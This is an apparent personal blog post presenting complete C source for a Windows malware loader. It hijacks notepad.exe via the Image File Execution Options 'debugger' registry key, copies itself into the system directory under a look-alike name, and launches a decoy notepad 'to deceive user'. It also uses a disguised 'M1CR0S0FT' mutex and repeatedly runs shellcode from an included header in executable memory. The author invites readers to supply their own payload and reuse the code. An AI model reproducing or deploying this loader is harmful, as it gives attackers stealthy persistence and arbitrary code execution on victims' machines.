It's been a while since I last logged on . Not much good news for these days . I abandoned some
classses and wrote a program. And finally , the prototype was finished an hour ago . Now I am
enhancing its functionabilities. The prime mission for this program is hijacking notepad when
user trying to read a txt file by notepad . This can be done by adding a subkey to a specific
path in registry.
SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\debugger
When user run notepad , windows will check the register key shows above . And starts the
program specified by the subkey debugger . Here is the code:
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<windows.h>
#include<winbase.h>
#include<psapi.h>
#include<Winreg.h>
#include"shellcode.h"
#include<Shlwapi.h>
/* */
int len;
char targetPath[]="\\notepad.exe";
char puppetPath[]="\\notpead.exe";
char newTargetPath[]="\\noetpad.exe";
char regPath[]="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe\\\0";
char regSubKey[]="debugger\0";
const char UID[]="M1CR0S0FT\0";
HANDLE hMutex;
char sysdir[MAX_PATH]={0};
//create puppet process :notepad.exe to deceive user
void CreatePuppet( char * param);
bool IsReplaced(void);//abandoned function
//install our "debugger" to system
void Install(void) ;
//make sure only one payload is running
void SingleInstance(void);
void ExecPayload(void) ;
int main( int argc, char **argv)
{
Install();
if(argc>=2){
if(argv[2]!=0){
CreatePuppet(argv[2]);
SingleInstance() ;
while(1){
Sleep(3000);
ExecPayload();
}
}
}
}
void CreatePuppet( char * param)
{
SECURITY_ATTRIBUTES pa;
pa.nLength=sizeof(pa) ;
pa.lpSecurityDescriptor=NULL;
pa.bInheritHandle=TRUE;
PROCESS_INFORMATION pi;
STARTUPINFO si={sizeof(si)};
char systmp[MAX_PATH];
memcpy(systmp,sysdir,len);
strcat(systmp,puppetPath);
//printf("debug =%s\n",systmp);
char *arg=(char*)malloc(strlen(systmp)+strlen(param)+1);
strcpy(arg,systmp);
strcat(arg," ");
strcat(arg,param);
printf("param=%s\n",arg);
BOOL bRet=CreateProcess(
NULL,//不在此指定可执行文件的文件名
arg,//命令行参数
NULL,//默认进程安全性
NULL,//默认进程安全性
TRUE,//指定当前进程内句柄不可以被子进程继承
NORMAL_PRIORITY_CLASS,//为新进程创建一个新的控制台窗口
NULL,//使用本进程的环境变量
NULL,//使用本进程的驱动器和目录
&si,
&pi);
CloseHandle(pi.hProcess);
}
bool IsReplaced(void)
{
PBYTE p=(PBYTE) GetModuleHandle(NULL);
p=(int)p[0x3c]+p;
DWORD selfTimeStamp=((PIMAGE_NT_HEADERS)p)->FileHeader.TimeDateStamp;
//printf("DEBUG time=%08X\n",selfTimeStamp);
/* caution : in 64-bit OS ,32-bit application would open c:\\windows\\sysWOW64\\notepad.exe*/
HANDLE hFile=CreateFile(targetPath,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,0);
if(hFile==INVALID_HANDLE_VALUE){
puts("can not open file \n");
return 0;
}
HANDLE hMapFile=CreateFileMapping(hFile,NULL,PAGE_READONLY,0,0,0);
if(hMapFile==NULL){
puts("can not map file \n");
return 0;
}
DWORD offsetHigh;
DWORD offsetLow=GetFileSize(hFile,&offsetHigh);
PVOID pDat=(PVOID)MapViewOfFile(hMapFile,FILE_MAP_READ,0,0,offsetLow);
p=(PBYTE) pDat;
p=(int)p[0x3c]+p;
DWORD targetTimeStamp=((PIMAGE_NT_HEADERS)p)->FileHeader.TimeDateStamp;
UnmapViewOfFile(pDat);
CloseHandle(hMapFile);
CloseHandle(hFile);
//printf("DEBUG time=%08X\n",targetTimeStamp);
return targetTimeStamp==selfTimeStamp;
}
void Install(void)
{
len=GetSystemDirectory(sysdir,MAX_PATH);
char systmp[MAX_PATH],systmp1[MAX_PATH];
//priviledge escalation is needed !
//copy our "debugger" to system directory only once
memcpy(systmp,sysdir,len+1);
strcat(systmp,newTargetPath);
HANDLE hFile=CreateFile(systmp,GENERIC_READ,FILE_SHARE_READ,NULL,OPEN_EXISTING,0,0);
if(GetLastError()==ERROR_FILE_NOT_FOUND){
TCHAR selfPath[MAX_PATH] ;
GetModuleFileName(NULL,selfPath,MAX_PATH);
if(CopyFile(selfPath,systmp,FALSE)==0)
printf("copy file failed with Error code=%08X\n",GetLastError());
}else if(GetLastError()==ERROR_SUCCESS)
CloseHandle(hFile) ;
memcpy(systmp,sysdir,len+1);
strcat(systmp,targetPath);
memcpy(systmp1,sysdir,len+1);
strcat(systmp1,puppetPath);
//another copy of notepad.exe , cause every notepad.exe will be redirect to our "debugger"
CopyFile(systmp,systmp1,TRUE);
//create reg key to hijack notepad
HKEY hKey;
if(RegOpenKeyEx(HKEY_LOCAL_MACHINE,regPath,0,KEY_SET_VALUE,&hKey)!=ERROR_SUCCESS){
printf("open reg key code=%08X\n",GetLastError());
if(RegCreateKey(HKEY_LOCAL_MACHINE,regPath,&hKey)!=ERROR_SUCCESS){
printf(" create reg key code=%08X\n",GetLastError());
exit(0);
}
}
memcpy(systmp,sysdir,len+1);
strcat(systmp,newTargetPath);
if(RegSetValueEx(hKey,regSubKey,0,REG_SZ,(BYTE*)systmp,strlen(systmp))==ERROR_SUCCESS)
puts("set key success\n");
else
printf("RegSetValue failed with code=%08X\n",GetLastError());
}
void SingleInstance(void)
{
hMutex=CreateMutex(NULL,TRUE,UID);
if(GetLastError()==ERROR_ALREADY_EXISTS){
CloseHandle(hMutex);
exit(0);
}
}
void ExecPayload(void)
{
LPVOID Memory = VirtualAlloc(NULL, sizeof(payload), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
memcpy(Memory, payload, sizeof(payload));
((void(*)())Memory)();
}
I used some codes wrote before . The variable payload is not defined here . You must specify your own
payload to execute . Of course , you can copy any part of my codes to your own project . I will be happy if
my codes helpd you out . Though it might be a joke to you ......
Crap ! After I read my codes more cautiously , I found that there was nothing new idea in it .
Aye ! Ugly codes and limitted mind !
Forgive me !